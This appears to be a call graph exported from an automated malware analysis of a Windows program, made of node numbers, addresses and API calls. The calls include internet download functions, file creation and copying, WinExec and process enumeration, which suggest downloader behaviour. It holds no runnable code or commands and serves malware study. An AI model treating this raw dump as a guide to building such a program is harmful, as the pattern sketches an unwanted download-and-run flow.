17562 2526c32 17560->17562 17563 2526b25 17561->17563 17564 2514c24 11 API calls 17562->17564 17565 25136bc 7 API calls 17563->17565 17568 2526c52 17564->17568 17566 2526b4c 17565->17566 17567 2512d28 4 API calls 17566->17567 17569 2526b51 17567->17569 17571 2514bb0 11 API calls 17568->17571 17570 25134cc 6 API calls 17569->17570 17572 2526b5b 17570->17572 17575 2526c87 17571->17575 17573 2512d28 4 API calls 17572->17573 17574 2526b60 17573->17574 17576 2514f90 11 API calls 17574->17576 17578 25236cc 20 API calls 17575->17578 17577 2526b6c 17576->17577 17580 2514dbc 11 API calls 17577->17580 17579 2526cab 17578->17579 17584 2512fc4 22 API calls 17579->17584 17581 2526b92 17580->17581 17582 2513454 6 API calls 17581->17582 17583 2526ba0 17582->17583 17585 2512d28 4 API calls 17583->17585 17586 2526cc0 17584->17586 17587 2526ba5 17585->17587 18322 25136bc 17586->18322 17588 2513474 4 API calls 17587->17588 17589 2526baf 17588->17589 17591 2512d28 4 API calls 17589->17591 17593 2526bb4 17591->17593 17596 2514c24 11 API calls 17593->17596 17601 2526ffb 17596->17601 17599 2512d28 4 API calls 17600 2526cfb 17599->17600 17602 2514f90 11 API calls 17600->17602 17604 2514bb0 11 API calls 17601->17604 17603 2526d07 17602->17603 18337 2514dbc 17603->18337 17608 2527030 17604->17608 17611 25236cc 20 API calls 17608->17611 17610 2512d28 4 API calls 17612 2526d40 17610->17612 17613 2527054 17611->17613 18346 2513474 17612->18346 17615 2514c24 11 API calls 17613->17615 17621 2527074 17615->17621 17617 2512d28 4 API calls 17618 2526d4f 17617->17618 18353 2525300 17618->18353 17623 2514bb0 11 API calls 17621->17623 17627 25270a9 17623->17627 17625 25148f4 11 API calls 17626 2526d8d 17625->17626 18370 2525b34 17626->18370 17629 25236cc 20 API calls 17627->17629 17631 25270cd 17629->17631 17633 2514c24 11 API calls 17631->17633 17632 25148f4 11 API calls 17634 2526db9 17632->17634 17639 25270ed 17633->17639 18379 252521c InternetOpenA 17634->18379 17636 2526dc3 17637 2526e8e 17636->17637 18387 2525974 17636->18387 18406 25258b0 17637->18406 17644 2514bb0 11 API calls 17639->17644 17641 2526ddb 17643 25148f4 11 API calls 17641->17643 17645 2526deb Sleep 17643->17645 17649 2527122 17644->17649 17651 2526e05 17645->17651 17646 2525300 16 API calls 17647 2526eb5 17646->17647 17648 2515a4c 13 API calls 17647->17648 17650 2526ecb 17648->17650 17653 25236cc 20 API calls 17649->17653 17652 25148f4 11 API calls 17650->17652 17654 25236cc 20 API calls 17651->17654 17655 2526ede 17652->17655 17656 2527146 17653->17656 17662 2526e28 17654->17662 17658 2525b34 11 API calls 17655->17658 17657 25148f4 11 API calls 17656->17657 17659 2527155 17657->17659 17660 2526efa 17658->17660 17661 2514c24 11 API calls 17659->17661 17663 25148f4 11 API calls 17660->17663 17668 2527175 17661->17668 17665 25236cc 20 API calls 17662->17665 17664 2526f0a 17663->17664 17666 252521c 5 API calls 17664->17666 17671 2526e5b 17665->17671 17667 2526f14 17666->17667 17669 2526f38 Sleep 17667->17669 17670 2526f18 17667->17670 17673 2514bb0 11 API calls 17668->17673 17677 2526f52 17669->17677 17672 2525974 16 API calls 17670->17672 17675 25236cc 20 API calls 17671->17675 17674 2526f28 17672->17674 17678 25271aa 17673->17678 17676 25148f4 11 API calls 17674->17676 17675->17637 17676->17669 17679 25236cc 20 API calls 17677->17679 17680 25236cc 20 API calls 17678->17680 17682 2526f75 17679->17682 17681 25271ce 17680->17681 17683 25258b0 11 API calls 17681->17683 17684 25236cc 20 API calls 17682->17684 17685 25271d8 17683->17685 17687 2526fa8 17684->17687 17685->17373 18412 2525bdc 17685->18412 17690 25236cc 20 API calls 17687->17690 17689 25148f4 11 API calls 17691 252720e 17689->17691 17690->17593 18425 2525ac0 17691->18425 17694 25148f4 11 API calls 17695 252722e 17694->17695 17696 2514c24 11 API calls 17695->17696 17697 252724e 17696->17697 17698 2514bb0 11 API calls 17697->17698 17699 2527283 17698->17699 17700 25236cc 20 API calls 17699->17700 17701 25272a7 17700->17701 17702 2525300 16 API calls 17701->17702 17703 25272ce 17702->17703 17704 2515a4c 13 API calls 17703->17704 17705 25272e4 17704->17705 17706 25148f4 11 API calls 17705->17706 17707 25272f7 17706->17707 17708 25148f4 11 API calls 17707->17708 17709 252730a 17708->17709 17710 25148f4 11 API calls 17709->17710 17711 252731d 17710->17711 17712 25148f4 11 API calls 17711->17712 17713 2527330 17712->17713 17714 25148f4 11 API calls 17713->17714 17715 2527343 17714->17715 17716 25148f4 11 API calls 17715->17716 17717 2527356 17716->17717 17718 25148f4 11 API calls 17717->17718 17719 2527369 17718->17719 17720 25148f4 11 API calls 17719->17720 17721 252737c 17720->17721 17722 25148f4 11 API calls 17721->17722 17723 252738f 17722->17723 17724 2514c24 11 API calls 17723->17724 17725 25273af 17724->17725 17726 2514bb0 11 API calls 17725->17726 17727 25273e4 17726->17727 17728 25236cc 20 API calls 17727->17728 17729 2527408 17728->17729 17730 2514c24 11 API calls 17729->17730 17731 2527428 17730->17731 17732 2514bb0 11 API calls 17731->17732 17733 252745d 17732->17733 17734 25236cc 20 API calls 17733->17734 17735 2527481 17734->17735 17736 2514c24 11 API calls 17735->17736 17737 25274a1 17736->17737 17738 2514bb0 11 API calls 17737->17738 17739 25274d6 17738->17739 17740 25236cc 20 API calls 17739->17740 17741 25274fa 17740->17741 17742 25148f4 11 API calls 17741->17742 17743 2527509 17742->17743 18432 2518134 17743->18432 17746 2527551 17747 2514dc4 11 API calls 17746->17747 17748 2527584 17747->17748 17750 2514c24 11 API calls 17748->17750 17749 252752f 18506 25182c8 17749->18506 17752 25275a4 17750->17752 17753 2514bb0 11 API calls 17752->17753 17754 25275d9 17753->17754 17755 25236cc 20 API calls 17754->17755 17756 25275fd 17755->17756 17757 2527cbb 17756->17757 17759 2525ac0 11 API calls 17756->17759 17758 2514c24 11 API calls 17757->17758 17762 2527cdb 17758->17762 17760 252762d 17759->17760 17761 2514c24 11 API calls 17760->17761 17764 2527648 17761->17764 17763 2514bb0 11 API calls 17762->17763 17768 2527d10 17763->17768 17765 2518110 GetFileAttributesA 17764->17765 17766 252766b 17765->17766 17766->17757 17767 2527673 17766->17767 17769 2514c24 11 API calls 17767->17769 17770 25236cc 20 API calls 17768->17770 17773 2527693 17769->17773 17771 2527d34 17770->17771 17772 2514c24 11 API calls 17771->17772 17775 2527d54 17772->17775 17774 2514bb0 11 API calls 17773->17774 17777 25276c8 17774->17777 17776 2514bb0 11 API calls 17775->17776 17780 2527d89 17776->17780 17778 25236cc 20 API calls 17777->17778 17779 25276ec 17778->17779 17781 2514c24 11 API calls 17779->17781 17782 25236cc 20 API calls 17780->17782 17785 252770c 17781->17785 17783 2527dad 17782->17783 17784 2514c24 11 API calls 17783->17784 17787 2527dcd 17784->17787 17786 2514bb0 11 API calls 17785->17786 17789 2527741 17786->17789 17788 2514bb0 11 API calls 17787->17788 17791 2527e02 17788->17791 17790 25236cc 20 API calls 17789->17790 17792 2527765 17790->17792 17794 25236cc 20 API calls 17791->17794 17793 2514c24 11 API calls 17792->17793 17795 2527786 17793->17795 17797 2527e26 17794->17797 17798 2518110 GetFileAttributesA 17795->17798 17796 2528baa 17799 2514c24 11 API calls 17796->17799 17797->17796 17800 2514c24 11 API calls 17797->17800 17805 25277a7 17798->17805 17803 2528bca 17799->17803 17804 2527e5b 17800->17804 17801 25277d4 17802 2514c24 11 API calls 17801->17802 17808 25277fa 17802->17808 17806 2514bb0 11 API calls 17803->17806 17807 2518110 GetFileAttributesA 17804->17807 17805->17801 18436 2525698 17805->18436 17813 2528bff 17806->17813 17809 2527e7e 17807->17809 17812 2514c24 11 API calls 17808->17812 17809->17796 17811 2527e86 17809->17811 17814 2518134 GetFileAttributesA 17811->17814 17817 2527831 17812->17817 17815 25236cc 20 API calls 17813->17815 17816 2527ea1 17814->17816 17818 2528c23 17815->17818 17819 2528535 17816->17819 17820 2527ea9 17816->17820 17824 2514bb0 11 API calls 17817->17824 17822 2514c24 11 API calls 17818->17822 17821 2514c24 11 API calls 17819->17821 17823 2514c24 11 API calls 17820->17823 17825 2528555 17821->17825 17826 2528c43 17822->17826 17827 2527ec9 17823->17827 17828 2527866 17824->17828 17831 2514bb0 11 API calls 17825->17831 17829 2514bb0 11 API calls 17826->17829 17830 2514bb0 11 API calls 17827->17830 17832 25236cc 20 API calls 17828->17832 17835 2528c78 17829->17835 17836 2527efe 17830->17836 17837 252858a 17831->17837 17833 252788a 17832->17833 17834 2514c24 11 API calls 17833->17834 17842 25278aa 17834->17842 17839 25236cc 20 API calls 17835->17839 17840 25236cc 20 API calls 17836->17840 17838 25236cc 20 API calls 17837->17838 17841 25285ae 17838->17841 17843 2528c9c 17839->17843 17844 2527f22 17840->17844 17845 2514c24 11 API calls 17841->17845 17848 2514bb0 11 API calls 17842->17848 17846 2514c24 11 API calls 17843->17846 17847 2514c24 11 API calls 17844->17847 17849 25285ce 17845->17849 17850 2528cbc 17846->17850 17851 2527f42 17847->17851 17852 25278df 17848->17852 17853 2514bb0 11 API calls 17849->17853 17854 2514bb0 11 API calls 17850->17854 17855 2514bb0 11 API calls 17851->17855 17856 25236cc 20 API calls 17852->17856 17860 2528603 17853->17860 17858 2528cf1 17854->17858 17859 2527f77 17855->17859 17857 2527903 17856->17857 17861 2512fc4 22 API calls 17857->17861 17863 25236cc 20 API calls 17858->17863 17864 25236cc 20 API calls 17859->17864 17865 25236cc 20 API calls 17860->17865 17862 252791d 17861->17862 17870 2527928 CopyFileA 17862->17870 17866 2528d15 17863->17866 17867 2527f9b 17864->17867 17868 2528627 17865->17868 18471 2525580 17866->18471 17872 2514c24 11 API calls 17867->17872 17869 2514c24 11 API calls 17868->17869 17876 2528647 17869->17876 17877 252793e 17870->17877 17878 2527fbb 17872->17878 17874 25148f4 11 API calls 17875 2528d3b 17874->17875 17881 2525b34 11 API calls 17875->17881 17880 2514bb0 11 API calls 17876->17880 17879 25236cc 20 API calls 17877->17879 17882 2514bb0 11 API calls 17878->17882 17886 2527961 17879->17886 17889 252867c 17880->17889 17883 2528d57 17881->17883 17888 2527ff0 17882->17888 17884 25148f4 11 API calls 17883->17884 17885 2528d67 17884->17885 17887 2525ac0 11 API calls 17885->17887 17890 25236cc 20 API calls 17886->17890 17891 2528d77 17887->17891 17893 25236cc 20 API calls 17888->17893 17894 25236cc 20 API calls 17889->17894 17899 2527994 17890->17899 18484 2525910 17891->18484 17896 2528014 17893->17896 17901 25286a0 17894->17901 17898 2514c24 11 API calls 17896->17898 17897 25148f4 11 API calls 17900 2528d98 17897->17900 17906 2528034 17898->17906 17903 25236cc 20 API calls 17899->17903 17902 2514c24 11 API calls 17900->17902 17904 2517c64 11 API calls 17901->17904 17910 2528db8 17902->17910 17905 25279c7 17903->17905 17907 25286d5 17904->17907 18445 252540c 17905->18445 17911 2514c24 11 API calls 17906->17911 17913 2514c24 11 API calls 17907->17913 17915 2514bb0 11 API calls 17910->17915 17917 2528071 17911->17917 17912 25148f4 11 API calls 17914 25279f2 17912->17914 17926 2528705 17913->17926 17916 2514c24 11 API calls 17914->17916 17918 2528ded 17915->17918 17920 2527a12 17916->17920 17919 2514c24 11 API calls 17917->17919 17921 25236cc 20 API calls 17918->17921 17925 25280ae 17919->17925 17922 2514bb0 11 API calls 17920->17922 17923 2528e11 17921->17923 17928 2527a47 17922->17928 17924 2514c24 11 API calls 17923->17924 17929 2528e31 17924->17929 17927 2514c24 11 API calls 17925->17927 17926->17369 17932 25280e5 17927->17932 17930 25236cc 20 API calls 17928->17930 17931 2514bb0 11 API calls 17929->17931 17934 2527a6b 17930->17934 17935 2528e66 17931->17935 17933 2514bb0 11 API calls 17932->17933 17938 252811a 17933->17938 17936 2514c24 11 API calls 17934->17936 17937 25236cc 20 API calls 17935->17937 17943 2527ab9 17936->17943 17939 2528e8a 17937->17939 17941 25236cc 20 API calls 17938->17941 17940 2514c24 11 API calls 17939->17940 17948 2528eaa 17940->17948 17942 252813e 17941->17942 18509 2525540 17942->18509 18462 2517c64 17943->18462 17952 2514bb0 11 API calls 17948->17952 17949 25148f4 11 API calls 17951 2528163 17949->17951 17950 2514bb0 11 API calls 17957 2527af7 17950->17957 17953 2525698 14 API calls 17951->17953 17958 2528edf 17952->17958 17954 2528173 17953->17954 17955 2525540 11 API calls 17954->17955 17956 2528188 17955->17956 17959 25148f4 11 API calls 17956->17959 17960 2517c64 11 API calls 17957->17960 17963 25236cc 20 API calls 17958->17963 17961 2528198 17959->17961 17962 2527b1d 17960->17962 17964 2525698 14 API calls 17961->17964 17967 2514bb0 11 API calls 17962->17967 17965 2528f03 17963->17965 17966 25281a8 17964->17966 17968 2514c24 11 API calls 17965->17968 17969 2514c24 11 API calls 17966->17969 17970 2527b33 17967->17970 17975 2528f23 17968->17975 17971 25281c8 17969->17971 17973 2525ac0 11 API calls 17970->17973 17972 2525698 14 API calls 17971->17972 17978 25281d9 17972->17978 17974 2527b5e 17973->17974 17976 2514c24 11 API calls 17974->17976 17977 2514bb0 11 API calls 17975->17977 17980 2527b79 17976->17980 17982 2528f58 17977->17982 17979 2517c64 11 API calls 17978->17979 17981 252820e 17979->17981 18466 2521c04 17980->18466 17984 2514c24 11 API calls 17981->17984 17983 25236cc 20 API calls 17982->17983 17985 2528f7c 17983->17985 17990 252823e 17984->17990 17986 2514c24 11 API calls 17985->17986 17988 2528f9c 17986->17988 17987 2527ba1 17987->17369 17989 2514bb0 11 API calls 17988->17989 17991 2528fd1 17989->17991 17990->17369 17992 25236cc 20 API calls 17991->17992 17995 2528ff5 17992->17995 17993 252934e 17994 2514c24 11 API calls 17993->17994 17996 252936e 17994->17996 17995->17993 17997 2529034 17995->17997 17999 2514bb0 11 API calls 17996->17999 17998 2514c24 11 API calls 17997->17998 18000 2529054 17998->18000 18001 25293a3 17999->18001 18002 2514bb0 11 API calls 18000->18002 18003 25236cc 20 API calls 18001->18003 18004 2529089 18002->18004 18009 25293c7 18003->18009 18007 25236cc 20 API calls 18004->18007 18005 2529841 18006 2514c24 11 API calls 18005->18006 18011 2529861 18006->18011 18008 25290ad 18007->18008 18010 2514c24 11 API calls 18008->18010 18009->18005 18012 2529406 18009->18012 18015 25290cd 18010->18015 18013 2514bb0 11 API calls 18011->18013 18014 2514c24 11 API calls 18012->18014 18017 2529896 18013->18017 18018 2529426 18014->18018 18016 2514bb0 11 API calls 18015->18016 18021 2529102 18016->18021 18019 25236cc 20 API calls 18017->18019 18020 2514bb0 11 API calls 18018->18020 18033 25298ba 18019->18033 18025 252945b 18020->18025 18022 25236cc 20 API calls 18021->18022 18023 2529126 18022->18023 18026 2514c24 11 API calls 18023->18026 18024 2529a11 18027 2514c24 11 API calls 18024->18027 18028 25236cc 20 API calls 18025->18028 18032 252915b 18026->18032 18031 2529a46 18027->18031 18029 252947f 18028->18029 18030 2514c24 11 API calls 18029->18030 18037 252949f 18030->18037 18034 2514bb0 11 API calls 18031->18034 18035 2514bb0 11 API calls 18032->18035 18033->18024 18036 2514c24 11 API calls 18033->18036 18039 2529a7b 18034->18039 18040 2529190 18035->18040 18041 2529919 18036->18041 18038 2514bb0 11 API calls 18037->18038 18045 25294d4 18038->18045 18043 25236cc 20 API calls 18039->18043 18044 25236cc 20 API calls 18040->18044 18042 2514bb0 11 API calls 18041->18042 18048 252994e 18042->18048 18050 2529a9f 18043->18050 18047 25291b4 18044->18047 18046 25236cc 20 API calls 18045->18046 18049 25294f8 WinExec 18046->18049 18052 25236cc 20 API calls 18047->18052 18053 25236cc 20 API calls 18048->18053 18530 25245f8 CreateToolhelp32Snapshot 18049->18530 18055 25236cc 20 API calls 18050->18055 18056 25291e7 18052->18056 18057 2529972 18053->18057 18059 2529ad2 18055->18059 18061 2514c24 11 API calls 18056->18061 18062 2514c24 11 API calls 18057->18062 18058 2514c24 11 API calls 18063 2529555 18058->18063 18060 2514c24 11 API calls 18059->18060 18064 2529af2 18060->18064 18065 2529207 18061->18065 18066 2529992 18062->18066 18067 2514bb0 11 API calls 18063->18067 18068 2514bb0 11 API calls 18064->18068 18069 2514bb0 11 API calls 18065->18069 18070 2514bb0 11 API calls 18066->18070 18071 252958a 18067->18071 18074 2529b27 18068->18074 18072 252923c 18069->18072 18073 25299c7 18070->18073 18075 25236cc 20 API calls 18071->18075 18076 25236cc 20 API calls 18072->18076 18077 25236cc 20 API calls 18073->18077 18079 25236cc 20 API calls 18074->18079 18078 25295ae 18075->18078 18087 2529260 18076->18087 18080 25299eb 18077->18080 18081 2514dbc 11 API calls 18078->18081 18086 2529b4b 18079->18086 18082 2512fc4 22 API calls 18080->18082 18083 25295b8 18081->18083 18084 25299f8 18082->18084 18537 2523f94 18083->18537 18088 2514dbc 11 API calls 18084->18088 18092 25236cc 20 API calls 18086->18092 18093 25236cc 20 API calls 18087->18093 18090 2529a09 18088->18090 18489 25248a4 18090->18489 18091 2514c24 11 API calls 18099 25295e4 18091->18099 18095 2529b7e 18092->18095 18096 2529293 18093->18096 18097 2514c24 11 API calls 18095->18097 18098 2514c24 11 API calls 18096->18098 18101 2529b9e 18097->18101 18102 25292b3 18098->18102 18100 2514bb0 11 API calls 18099->18100 18105 2529619 18100->18105 18104 2514bb0 11 API calls 18101->18104 18103 2514bb0 11 API calls 18102->18103 18107 25292e8 18103->18107 18108 2529bd3 18104->18108 18106 25236cc 20 API calls 18105->18106 18111 252963d 18106->18111 18110 25236cc 20 API calls 18107->18110 18109 25236cc 20 API calls 18108->18109 18113 2529bf7 18109->18113 18114 252930c 18110->18114 18112 25236cc 20 API calls 18111->18112 18115 2529670 18112->18115 18117 25236cc 20 API calls 18113->18117 18118 25236cc 20 API calls 18114->18118 18116 2514c24 11 API calls 18115->18116 18123 2529690 18116->18123 18119 2529c2a 18117->18119 18120 252933f 18118->18120 18121 2514c24 11 API calls 18119->18121 18122 2514dbc 11 API calls 18120->18122 18127 2529c4a 18121->18127 18124 2529349 18122->18124 18126 2514bb0 11 API calls 18123->18126 18514 2524f34 18124->18514 18129 25296c5 18126->18129 18128 2514bb0 11 API calls 18127->18128 18131 2529c7f 18128->18131 18130 25236cc 20 API calls 18129->18130 18133 25296e9 18130->18133 18132 25236cc 20 API calls 18131->18132 18136 2529ca3 18132->18136 18134 25236cc 20 API calls 18133->18134 18135 252971c 18134->18135 18137 2514c24 11 API calls 18135->18137 18138 25236cc 20 API calls 18136->18138 18139 252973c 18137->18139 18140 2529cd6 18138->18140 18141 2514bb0 11 API calls 18139->18141 18142 25236cc 20 API calls 18140->18142 18145 2529771 18141->18145 18143 2529d09 18142->18143 18144 2514c24 11 API calls 18143->18144 18147 2529d29 18144->18147 18146 25236cc 20 API calls 18145->18146 18149 2529795 18146->18149 18148 2514bb0 11 API calls 18147->18148 18152 2529d5e 18148->18152 18150 25236cc 20 API calls 18149->18150 18151 25297c8 18150->18151 18153 2514c24 11 API calls 18151->18153 18154 25236cc 20 API calls 18152->18154 18157 25297e8 18153->18157 18155 2529d82 18154->18155 18156 2514c24 11 API calls 18155->18156 18159 2529da2 18156->18159 18158 2514bb0 11 API calls 18157->18158 18161 252981d 18158->18161 18160 2514bb0 11 API calls 18159->18160 18163 2529dd7 18160->18163 18162 25236cc 20 API calls 18161->18162 18162->18005 18164 25236cc 20 API calls 18163->18164 18165 2529dfb 18164->18165 18166 25236cc 20 API calls 18165->18166 18167 2529e2e 18166->18167 18168 25236cc 20 API calls 18167->18168 18169 2529e61 18168->18169 18170 25236cc 20 API calls 18169->18170 18171 2529e94 18170->18171 18172 25236cc 20 API calls 18171->18172 18173 2529ec7 18172->18173 18174 25236cc 20 API calls 18173->18174 18175 2529efa 18174->18175 18176 25236cc 20 API calls 18175->18176 18177 2529f2d 18176->18177 18178 25236cc 20 API calls 18177->18178 18179 2529f60 18178->18179 18180 25236cc 20 API calls 18179->18180 18181 2529f93 18180->18181 18182 25236cc 20 API calls 18181->18182 18183 2529fc6 18182->18183 18184 25236cc 20 API calls 18183->18184 18185 2529ff9 18184->18185 18186 25236cc 20 API calls 18185->18186 18187 252a02c 18186->18187 18188 25236cc 20 API calls 18187->18188 18189 252a05f 18188->18189 18190 25236cc 20 API calls 18189->18190 18191 252a092 18190->18191 18192 25236cc 20 API calls 18191->18192 18193 252a0c5 18192->18193 18194 25236cc 20 API calls 18193->18194 18195 252a0f8 18194->18195 18196 25236cc 20 API calls 18195->18196 18197 252a12b 18196->18197 18198 25236cc 20 API calls 18197->18198 18199 252a15e 18198->18199 18200 25236cc 20 API calls 18199->18200 18201 252a191 18200->18201 18202 25236cc 20 API calls 18201->18202 18203 252a1c4 18202->18203 18204 25236cc 20 API calls 18203->18204 18205 252a1f7 18204->18205 18206 25236cc 20 API calls 18205->18206 18207 252a22a 18206->18207 18208 25236cc 20 API calls 18207->18208 18209 252a25d 18208->18209 18210 25236cc 20 API calls 18209->18210 18211 252a290 18210->18211 18212 25236cc 20 API calls 18211->18212 18213 252a2c3 18212->18213 18214 25236cc 20 API calls 18213->18214 18215 252a2f6 18214->18215 18216 25236cc 20 API calls 18215->18216 18217 252a329 18216->18217 18218 25236cc 20 API calls 18217->18218 18219 252a35c 18218->18219 18220 25236cc 20 API calls 18219->18220 18221 252a38f 18220->18221 18222 25236cc 20 API calls 18221->18222 18223 252a3c2 18222->18223 18224 25236cc 20 API calls 18223->18224 18225 252a3f5 18224->18225 18226 25236cc 20 API calls 18225->18226 18227 252a428 18226->18227 18228 25236cc 20 API calls 18227->18228 18229 252a45b 18228->18229 18230 25236cc 20 API calls 18229->18230 18231 252a48e 18230->18231 18232 25236cc 20 API calls 18231->18232 18233 252a4c1 18232->18233 18234 25236cc 20 API calls 18233->18234 18235 252a4f4 18234->18235 18236 25236cc 20 API calls 18235->18236 18237 252a527 18236->18237 18238 25236cc 20 API calls 18237->18238 18239 252a55a 18238->18239 18240 25236cc 20 API calls 18239->18240 18241 252a58d 18240->18241 18242 25236cc 20 API calls 18241->18242 18243 252a5c0 18242->18243 18244 25236cc 20 API calls 18243->18244 18245 252a5f3 18244->18245 18246 2514c24 11 API calls 18245->18246 18247 252a613 18246->18247 18248 2514bb0 11 API calls 18247->18248 18249 252a648 18248->18249 18250 25236cc 20 API calls 18249->18250 18251 252a66c 18250->18251 18252 2514c24 11 API calls 18251->18252 18253 252a68c 18252->18253 18254 2514bb0 11 API calls 18253->18254 18255 252a6c1 18254->18255 18256 25236cc 20 API calls 18255->18256 18257 252a6e5 18256->18257 18258 25236cc 20 API calls 18257->18258 18259 252a718 18258->18259 18260 25236cc 20 API calls 18259->18260 18261 252a74b 18260->18261 18262 25236cc 20 API calls 18261->18262 18263 252a77e 18262->18263 18264 25236cc 20 API calls 18263->18264 18265 252a7b1 ExitProcess 18264->18265 18268 2513031 18267->18268 18269 251303c GetTickCount 18267->18269 18268->17375 18269->17375 18271 25236e7 18270->18271 18551 251cab0 SetErrorMode 18271->18551 18274 2523724 GetModuleHandleA 18275 2523738 18274->18275 18276 252376c FreeLibrary 18274->18276 18279 2523741 GetProcAddress 18275->18279 18277 2523777 18276->18277 18555 25148c4 18277->18555 18281 252375b 18279->18281 18559 25236a0 18281->18559 18284 2514bb4 18283->18284 18285 2514c15 18283->18285 18286 25148f4 18284->18286 18289 2514bbc 18284->18289 18291 2514964 11 API calls 18286->18291 18293 2514908 18286->18293 18287 2514936 18287->17513 18288 2514bcb 18292 2514964 11 API calls 18288->18292 18289->18285 18289->18288 18290 25148f4 11 API calls 18289->18290 18290->18288 18291->18293 18295 2514be5 18292->18295 18293->18287 18294 2512c5c 11 API calls 18293->18294 18294->18287 18296 25148f4 11 API calls 18295->18296 18297 2514c11 18296->18297 18297->17513 18299 25148a0 11 API calls 18298->18299 18300 2512fd8 18299->18300 18301 2512ffa GetCommandLineA 18300->18301 18302 2512fdc GetModuleFileNameA 18300->18302 18305 2513001 18301->18305 18569 2514990 18302->18569 18306 2512ff8 18305->18306 18574 2512ec8 18305->18574 18307 25181e0 18306->18307 18308 25181f3 18307->18308 18309 2514dc4 11 API calls 18308->18309 18310 2518205 18309->18310 18310->17538 18312 2514df6 18311->18312 18315 2514dc9 18311->18315 18313 25148a0 11 API calls 18312->18313 18314 2514dec 18313->18314 18314->17542 18315->18312 18316 2514ddd 18315->18316 18317 2514990 11 API calls 18316->18317 18317->18314 18319 2514d64 18318->18319 18320 251811a GetFileAttributesA 18319->18320 18321 2518125 18320->18321 18321->17550 18321->17551 18323 25136cb 18322->18323 18590 25135dc 18323->18590 18326 2512d28 18327 251676c 4 API calls 18326->18327 18328 2512d30 18327->18328 18329 25134cc 18328->18329 18330 2513506 18329->18330 18331 25134dd 18329->18331 18333 2512d48 4 API calls 18330->18333 18331->18330 18332 25134e3 GetFileSize 18331->18332 18334 25134f4 18332->18334 18335 25134f9 18332->18335 18333->18335 18606 2512d58 GetLastError 18334->18606 18335->17599 18339 2514d70 18337->18339 18338 2514dab 18343 2513454 18338->18343 18339->18338 18340 2514964 11 API calls 18339->18340 18341 2514d87 18340->18341 18341->18338 18342 2512c5c 11 API calls 18341->18342 18342->18338 18609 25133c4 18343->18609 18347 2513484 18346->18347 18349 25134b3 18346->18349 18347->18349 18351 251348a 18347->18351 18348 25134b1 18348->17617 18349->18348 18350 2512d48 4 API calls 18349->18350 18350->18348 18351->18348 18352 2512d48 4 API calls 18351->18352 18352->18348 18354 2525319 18353->18354 18355 25148f4 11 API calls 18354->18355 18356 2525345 18355->18356 18618 2515a04 18356->18618 18358 2525385 18359 25148f4 11 API calls 18358->18359 18361 2525397 18359->18361 18360 2514dc4 11 API calls 18362 2525369 18360->18362 18364 25148c4 11 API calls 18361->18364 18362->18358 18362->18360 18362->18361 18621 2514e04 18362->18621 18365 25253fc 18364->18365 18366 2515a4c 18365->18366 18367 2515a53 18366->18367 18368 2515a6d 18367->18368 18369 2515a10 13 API calls 18367->18369 18368->17625 18369->18368 18371 2525b51 18370->18371 18372 2525baf 18371->18372 18751 2514a88 18371->18751 18754 2514b6c 18371->18754 18374 25148a0 11 API calls 18372->18374 18375 2525bc4 18374->18375 18377 25148a0 11 API calls 18375->18377 18378 2525bcc 18377->18378 18378->17632 18380 2514d64 18379->18380 18381 2525248 InternetOpenUrlA 18380->18381 18382 2525262 18381->18382 18383 2525266 HttpQueryInfoA 18381->18383 18384 25252db InternetCloseHandle 18382->18384 18386 25252a1 18383->18386 18384->17636 18385 25252d0 InternetCloseHandle 18385->18384 18386->18385 18388 25148a0 11 API calls 18387->18388 18389 2525994 18388->18389 18390 2517c64 11 API calls 18389->18390 18391 25259af 18390->18391 18392 25259b7 InternetOpenA 18391->18392 18393 25259cf 18392->18393 18394 2525a9c 18392->18394 18395 25259ef InternetOpenUrlA 18393->18395 18396 25148a0 11 API calls 18394->18396 18397 2525a7c InternetCloseHandle 18395->18397 18402 2525a09 18395->18402 18398 2525ab1 18396->18398 18397->17641 18398->17641 18399 2525a17 InternetReadFile 18401 2514990 11 API calls 18399->18401 18401->18402 18402->18399 18403 2514b6c 11 API calls 18402->18403 18404 2525a5c InternetCloseHandle 18402->18404 18403->18402 18404->17641 18407 25258c7 18406->18407 18768 2517bc4 18407->18768 18410 25148c4 11 API calls 18411 2525901 18410->18411 18411->17593 18411->17646 18413 2525bfd 18412->18413 18414 25148a0 11 API calls 18413->18414 18417 2525c15 18414->18417 18415 2525c88 18416 25148f4 11 API calls 18415->18416 18418 2525c96 18416->18418 18417->18415 18419 2514a88 11 API calls 18417->18419 18422 2514b6c 11 API calls 18417->18422 18420 25148c4 11 API calls 18418->18420 18419->18417 18421 2525cb0 18420->18421 18423 25148a0 11 API calls 18421->18423 18422->18417 18424 2525cb8 18423->18424 18424->17689 18430 2525ae5 18425->18430 18426 2525b11 18427 25148a0 11 API calls 18426->18427 18429 2525b26 18427->18429 18428 2514a88 11 API calls 18428->18430 18429->17694 18430->18426 18430->18428 18431 2514b6c 11 API calls 18430->18431 18431->18430 18433 2514d64 18432->18433 18434 251813e GetFileAttributesA 18433->18434 18435 2518149 18434->18435 18435->17746 18435->17749 18437 25256ae 18436->18437 18438 25256ce _lcreat 18437->18438 18439 25256dd 18438->18439 18440 2514dbc 11 API calls 18439->18440 18441 25256ed _lwrite _lclose 18440->18441 18442 2525707 18441->18442 18443 25148c4 11 API calls 18442->18443 18444 2525714 18443->18444 18444->17801 18446 2525431 18445->18446 18775 2514938 18446->18775 18449 2514938 11 API calls 18450 2525465 18449->18450 18451 2514938 11 API calls 18450->18451 18452 2525470 18451->18452 18453 25148a0 11 API calls 18452->18453 18460 2525478 18453->18460 18454 2525499 18455 25148c4 11 API calls 18454->18455 18457 252552e 18455->18457 18456 252548e 18458 2514b6c 11 API calls 18456->18458 18457->17912 18458->18454 18459 2514c24 11 API calls 18459->18460 18460->18454 18460->18456 18460->18459 18461 2514dc4 11 API calls 18460->18461 18461->18460 18463 2517c74 18462->18463 18464 2514990 11 API calls 18463->18464 18465 2517c7c 18464->18465 18465->17950 18779 2522a04 18466->18779 18468 2521c1e 18783 2518094 WriteFile 18468->18783 18469 2521c39 18469->17987 18481 25255a2 18471->18481 18472 2525644 18473 2514f90 11 API calls 18472->18473 18474 2525659 18473->18474 18476 25148f4 11 API calls 18474->18476 18475 2514a88 11 API calls 18475->18481 18477 2525664 18476->18477 18479 25148a0 11 API calls 18477->18479 18478 2514b6c 11 API calls 18478->18481 18480 2525679 18479->18480 18482 25148c4 11 API calls 18480->18482 18481->18472 18481->18475 18481->18478 18483 2525686 18482->18483 18483->17874 18485 25148f4 11 API calls 18484->18485 18486 2525924 18485->18486 18487 252596b 18486->18487 18488 2514dbc 11 API calls 18486->18488 18487->17897 18488->18486 18493 25248b7 18489->18493 18490 2524b13 18491 25148a0 11 API calls 18490->18491 18492 2524b2e 